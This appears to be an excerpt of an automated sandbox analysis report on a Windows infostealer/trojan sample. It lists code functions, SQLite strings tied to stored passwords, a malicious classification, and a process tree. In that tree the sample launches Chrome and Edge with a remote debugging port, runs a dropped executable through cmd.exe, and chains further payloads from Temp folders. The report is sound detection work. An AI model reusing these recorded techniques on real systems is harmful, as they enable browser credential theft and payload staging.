Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Code function: 22_2_001A779B	22_2_001A779B
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Code function: 23_2_0016E530	23_2_0016E530
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Code function: 23_2_00186192	23_2_00186192
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Code function: 23_2_001A8860	23_2_001A8860
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Code function: 23_2_00164B30	23_2_00164B30
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Code function: 23_2_001A2D10	23_2_001A2D10
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Code function: 23_2_00164DE0	23_2_00164DE0
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Code function: 23_2_00180E13	23_2_00180E13
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Code function: 23_2_001A7049	23_2_001A7049
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Code function: 23_2_001A31A8	23_2_001A31A8
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Code function: 23_2_00181602	23_2_00181602
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Code function: 23_2_001A779B	23_2_001A779B
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Code function: 23_2_001A78BB	23_2_001A78BB
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Code function: 23_2_00183DF1	23_2_00183DF1
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Code function: 23_2_00197F36	23_2_00197F36

Found potential string decryption / allocating functions

Source: C:\Users\user\Desktop\file.exe	Code function: String function: 6C87DAE0 appears 47 times
Source: C:\Users\user\Desktop\file.exe	Code function: String function: 6C87D930 appears 38 times
Source: C:\Users\user\Desktop\file.exe	Code function: String function: 6C6894D0 appears 90 times
Source: C:\Users\user\Desktop\file.exe	Code function: String function: 6C719B10 appears 42 times
Source: C:\Users\user\Desktop\file.exe	Code function: String function: 6C67CBE8 appears 134 times
Source: C:\Users\user\Desktop\file.exe	Code function: String function: 6C713620 appears 52 times
Source: C:\Users\user\Desktop\file.exe	Code function: String function: 6C8709D0 appears 201 times
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Code function: String function: 0017DF80 appears 64 times
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Code function: String function: 00198E10 appears 35 times
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Code function: String function: 001780C0 appears 263 times
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Code function: String function: 0017D64E appears 66 times
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Code function: String function: 00177A00 appears 38 times
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Code function: String function: 0017D663 appears 39 times
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Code function: String function: 0017D942 appears 85 times
Source: C:\Users\user\DocumentsHCFBFBAEBK.exe	Code function: String function: 008580C0 appears 130 times

Sample file is different than original file name gathered from version info

Source: file.exe, 00000000.00000002.2581794875.000000006C8C5000.00000002.00000001.01000000.00000009.sdmp	Binary or memory string: OriginalFilenamenss3.dll0 vs file.exe
Source: file.exe, 00000000.00000002.2581050850.000000006C6D2000.00000002.00000001.01000000.0000000A.sdmp	Binary or memory string: OriginalFilenamemozglue.dll0 vs file.exe

Uses 32bit PE files

Source: file.exe

Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE

Source: file.exe	Static PE information: Section: juusqcgn ZLIB complexity 0.9949216411628256
Source: random[1].exe.0.dr	Static PE information: Section: juusqcgn ZLIB complexity 0.9949216411628256

Source: classification engine

Classification label: mal100.troj.spyw.evad.winEXE@77/289@33/18

Source: C:\Users\user\Desktop\file.exe

Code function: 0_2_6C6A7030 GetLastError,FormatMessageA,__acrt_iob_func,__acrt_iob_func,__acrt_iob_func,fflush,LocalFree,

0_2_6C6A7030

Source: C:\Users\user\Desktop\file.exe

File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\T9RRWRNL\EAPA0I9F.htm

Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\1005697001\a0969106aa.exe	Mutant created: NULL
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1684:120:WilError_03
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Mutant created: \Sessions\1\BaseNamedObjects\006700e5a2ab05704bbb0c589b88924d

Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

File created: C:\Users\user\AppData\Local\Temp\4764d088-b841-457e-b1e8-cac206941ac7.tmp

Jump to behavior

Source: C:\Users\user\Desktop\file.exe

File read: C:\Users\user\Desktop\desktop.ini

Jump to behavior

Source: C:\Users\user\Desktop\file.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: softokn3[1].dll.0.dr, softokn3.dll.0.dr	Binary or memory string: CREATE TABLE metaData (id PRIMARY KEY UNIQUE ON CONFLICT REPLACE, item1, item2);
Source: file.exe, 00000000.00000002.2580501541.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp, file.exe, 00000000.00000002.2581557840.000000006C87F000.00000002.00000001.01000000.00000009.sdmp, file.exe, 00000000.00000002.2567638542.000000001D144000.00000004.00000020.00020000.00000000.sdmp, nss3.dll.0.dr, nss3[1].dll.0.dr	Binary or memory string: UPDATE %Q.sqlite_master SET tbl_name = %Q, name = CASE WHEN type='table' THEN %Q WHEN name LIKE 'sqliteX_autoindex%%' ESCAPE 'X' AND type='index' THEN 'sqlite_autoindex_' \|\| %Q \|\| substr(name,%d+18) ELSE name END WHERE tbl_name=%Q COLLATE nocase AND (type='table' OR type='index' OR type='trigger');
Source: softokn3[1].dll.0.dr, softokn3.dll.0.dr	Binary or memory string: SELECT ALL * FROM %s LIMIT 0;
Source: file.exe, 00000000.00000002.2580501541.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp, file.exe, 00000000.00000002.2581557840.000000006C87F000.00000002.00000001.01000000.00000009.sdmp, file.exe, 00000000.00000002.2567638542.000000001D144000.00000004.00000020.00020000.00000000.sdmp, nss3.dll.0.dr, nss3[1].dll.0.dr	Binary or memory string: CREATE TABLE %Q.'%q_docsize'(docid INTEGER PRIMARY KEY, size BLOB);
Source: file.exe, 00000000.00000002.2580501541.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp, file.exe, 00000000.00000002.2581557840.000000006C87F000.00000002.00000001.01000000.00000009.sdmp, file.exe, 00000000.00000002.2567638542.000000001D144000.00000004.00000020.00020000.00000000.sdmp, nss3.dll.0.dr, nss3[1].dll.0.dr	Binary or memory string: CREATE TABLE IF NOT EXISTS %Q.'%q_stat'(id INTEGER PRIMARY KEY, value BLOB);
Source: file.exe, 00000000.00000002.2580501541.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp, file.exe, 00000000.00000002.2581557840.000000006C87F000.00000002.00000001.01000000.00000009.sdmp, file.exe, 00000000.00000002.2567638542.000000001D144000.00000004.00000020.00020000.00000000.sdmp, nss3.dll.0.dr, nss3[1].dll.0.dr	Binary or memory string: CREATE TABLE %Q.'%q_segdir'(level INTEGER,idx INTEGER,start_block INTEGER,leaves_end_block INTEGER,end_block INTEGER,root BLOB,PRIMARY KEY(level, idx));
Source: softokn3[1].dll.0.dr, softokn3.dll.0.dr	Binary or memory string: UPDATE %s SET %s WHERE id=$ID;
Source: softokn3[1].dll.0.dr, softokn3.dll.0.dr	Binary or memory string: SELECT ALL * FROM metaData WHERE id=$ID;
Source: softokn3[1].dll.0.dr, softokn3.dll.0.dr	Binary or memory string: SELECT ALL id FROM %s WHERE %s;
Source: softokn3[1].dll.0.dr, softokn3.dll.0.dr	Binary or memory string: INSERT INTO metaData (id,item1) VALUES($ID,$ITEM1);
Source: softokn3[1].dll.0.dr, softokn3.dll.0.dr	Binary or memory string: INSERT INTO %s (id%s) VALUES($ID%s);
Source: file.exe, file.exe, 00000000.00000002.2580501541.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp, file.exe, 00000000.00000002.2581557840.000000006C87F000.00000002.00000001.01000000.00000009.sdmp, file.exe, 00000000.00000002.2567638542.000000001D144000.00000004.00000020.00020000.00000000.sdmp, nss3.dll.0.dr, nss3[1].dll.0.dr	Binary or memory string: INSERT INTO %Q.sqlite_master VALUES('index',%Q,%Q,#%d,%Q);
Source: file.exe, 00000000.00000002.2580501541.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp, file.exe, 00000000.00000002.2567638542.000000001D144000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: CREATE TABLE x(addr INT,opcode TEXT,p1 INT,p2 INT,p3 INT,p4 TEXT,p5 INT,comment TEXT,subprog TEXT,stmt HIDDEN);
Source: file.exe, 00000000.00000002.2580501541.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp, file.exe, 00000000.00000002.2581557840.000000006C87F000.00000002.00000001.01000000.00000009.sdmp, file.exe, 00000000.00000002.2567638542.000000001D144000.00000004.00000020.00020000.00000000.sdmp, nss3.dll.0.dr, nss3[1].dll.0.dr	Binary or memory string: CREATE TABLE %Q.'%q_segments'(blockid INTEGER PRIMARY KEY, block BLOB);
Source: softokn3[1].dll.0.dr, softokn3.dll.0.dr	Binary or memory string: INSERT INTO metaData (id,item1,item2) VALUES($ID,$ITEM1,$ITEM2);
Source: file.exe, 00000000.00000003.2316581563.000000001D039000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2239887553.000000001D045000.00000004.00000020.00020000.00000000.sdmp, GHJDBAKEHDHDGCAKKJJE.0.dr, EHCBAAAFHJDHJJKEBGHI.0.dr	Binary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
Source: file.exe, 00000000.00000002.2580501541.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp, file.exe, 00000000.00000002.2567638542.000000001D144000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: CREATE TABLE "%w"."%w_parent"(nodeno INTEGER PRIMARY KEY,parentnode);
Source: softokn3[1].dll.0.dr, softokn3.dll.0.dr	Binary or memory string: SELECT ALL * FROM %s LIMIT 0;CREATE TEMPORARY TABLE %s AS SELECT * FROM %sD
Source: file.exe, 00000000.00000002.2580501541.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp, file.exe, 00000000.00000002.2567638542.000000001D144000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: CREATE TABLE x(type TEXT,schema TEXT,name TEXT,wr INT,subprog TEXT,stmt HIDDEN);
Source: softokn3[1].dll.0.dr, softokn3.dll.0.dr	Binary or memory string: SELECT DISTINCT %s FROM %s where id=$ID LIMIT 1;

Source: file.exe

Virustotal: Detection: 51%

Source: file.exe

String found in binary or memory: 3Cannot find '%s'. Please, re-install this application

Source: unknown	Process created: C:\Users\user\Desktop\file.exe "C:\Users\user\Desktop\file.exe"
Source: C:\Users\user\Desktop\file.exe	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9229 --profile-directory="Default"
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2540 --field-trial-handle=2480,i,12669535664876434942,9463197344397114714,262144 /prefetch:8
Source: C:\Users\user\Desktop\file.exe	Process created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --remote-debugging-port=9229 --profile-directory="Default"
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Process created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-GB --service-sandbox-type=none --mojo-platform-channel-handle=2248 --field-trial-handle=2112,i,15661409552434283723,8671285796704867672,262144 /prefetch:3
Source: unknown	Process created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --remote-debugging-port=9229 --profile-directory=Default --flag-switches-begin --flag-switches-end --disable-nacl --do-not-de-elevate
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Process created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-GB --service-sandbox-type=none --mojo-platform-channel-handle=2768 --field-trial-handle=2248,i,16075850456477314035,13090639209018372966,262144 /prefetch:3
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Process created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-GB --service-sandbox-type=asset_store_service --mojo-platform-channel-handle=6760 --field-trial-handle=2248,i,16075850456477314035,13090639209018372966,262144 /prefetch:8
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Process created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=entity_extraction_service.mojom.Extractor --lang=en-GB --service-sandbox-type=entity_extraction --onnx-enabled-for-ee --mojo-platform-channel-handle=7196 --field-trial-handle=2248,i,16075850456477314035,13090639209018372966,262144 /prefetch:8
Source: C:\Users\user\Desktop\file.exe	Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" /c start "" "C:\Users\user\DocumentsHCFBFBAEBK.exe"
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Users\user\DocumentsHCFBFBAEBK.exe "C:\Users\user\DocumentsHCFBFBAEBK.exe"
Source: C:\Users\user\DocumentsHCFBFBAEBK.exe	Process created: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe "C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe"
Source: unknown	Process created: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Process created: C:\Users\user\AppData\Local\Temp\1005695001\6fc7e371fe.exe "C:\Users\user\AppData\Local\Temp\1005695001\6fc7e371fe.exe"
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Process created: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe "C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe"
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Process created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=edge_search_indexer.mojom.SearchIndexerInterfaceBroker --lang=en-GB --service-sandbox-type=search_indexer --message-loop-type-ui --mojo-platform-channel-handle=7324 --field-trial-handle=2248,i,16075850456477314035,13090639209018372966,262144 /prefetch:8
Source: unknown	Process created: C:\Users\user\AppData\Local\Temp\1005695001\6fc7e371fe.exe "C:\Users\user\AppData\Local\Temp\1005695001\6fc7e371fe.exe"
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Process created: C:\Users\user\AppData\Local\Temp\1005697001\a0969106aa.exe "C:\Users\user\AppData\Local\Temp\1005697001\a0969106aa.exe"
Source: unknown	Process created: C:\Users\user\AppData\Local\Temp\1005695001\6fc7e371fe.exe "C:\Users\user\AppData\Local\Temp\1005695001\6fc7e371fe.exe"
Source: unknown	Process created: C:\Users\user\AppData\Local\Temp\1005697001\a0969106aa.exe "C:\Users\user\AppData\Local\Temp\1005697001\a0969106aa.exe"
Source: unknown	Process created: C:\Users\user\AppData\Local\Temp\1005697001\a0969106aa.exe "C:\Users\user\AppData\Local\Temp\1005697001\a0969106aa.exe"
Source: C:\Users\user\Desktop\file.exe	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9229 --profile-directory="Default"	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --remote-debugging-port=9229 --profile-directory="Default"	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" /c start "" "C:\Users\user\DocumentsHCFBFBAEBK.exe"	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2540 --field-trial-handle=2480,i,12669535664876434942,9463197344397114714,262144 /prefetch:8	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Process created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-GB --service-sandbox-type=none --mojo-platform-channel-handle=2248 --field-trial-handle=2112,i,15661409552434283723,8671285796704867672,262144 /prefetch:3	Jump to behavior
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Process created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-GB --service-sandbox-type=none --mojo-platform-channel-handle=2768 --field-trial-handle=2248,i,16075850456477314035,13090639209018372966,262144 /prefetch:3	Jump to behavior
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Process created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-GB --service-sandbox-type=asset_store_service --mojo-platform-channel-handle=6760 --field-trial-handle=2248,i,16075850456477314035,13090639209018372966,262144 /prefetch:8	Jump to behavior
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Process created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=entity_extraction_service.mojom.Extractor --lang=en-GB --service-sandbox-type=entity_extraction --onnx-enabled-for-ee --mojo-platform-channel-handle=7196 --field-trial-handle=2248,i,16075850456477314035,13090639209018372966,262144 /prefetch:8	Jump to behavior
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Process created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=edge_search_indexer.mojom.SearchIndexerInterfaceBroker --lang=en-GB --service-sandbox-type=search_indexer --message-loop-type-ui --mojo-platform-channel-handle=7324 --field-trial-handle=2248,i,16075850456477314035,13090639209018372966,262144 /prefetch:8	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Users\user\DocumentsHCFBFBAEBK.exe "C:\Users\user\DocumentsHCFBFBAEBK.exe"
Source: C:\Users\user\DocumentsHCFBFBAEBK.exe	Process created: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe "C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe"
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Process created: C:\Users\user\AppData\Local\Temp\1005695001\6fc7e371fe.exe "C:\Users\user\AppData\Local\Temp\1005695001\6fc7e371fe.exe"
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Process created: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe "C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe"
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Process created: C:\Users\user\AppData\Local\Temp\1005697001\a0969106aa.exe "C:\Users\user\AppData\Local\Temp\1005697001\a0969106aa.exe"

Source: C:\Users\user\Desktop\file.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: winmm.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: rstrtmgr.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: ntasn1.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: dpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: mozglue.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: wsock32.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: vcruntime140.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: msvcp140.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: vcruntime140.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: edputil.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: windows.staterepositoryps.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: appresolver.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: bcp47langs.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: slc.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: sppc.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: onecorecommonproxystub.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: onecoreuapcommonproxystub.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: pcacli.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: sfc_os.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: apphelp.dll
Source: C:\Users\user\DocumentsHCFBFBAEBK.exe	Section loaded: apphelp.dll
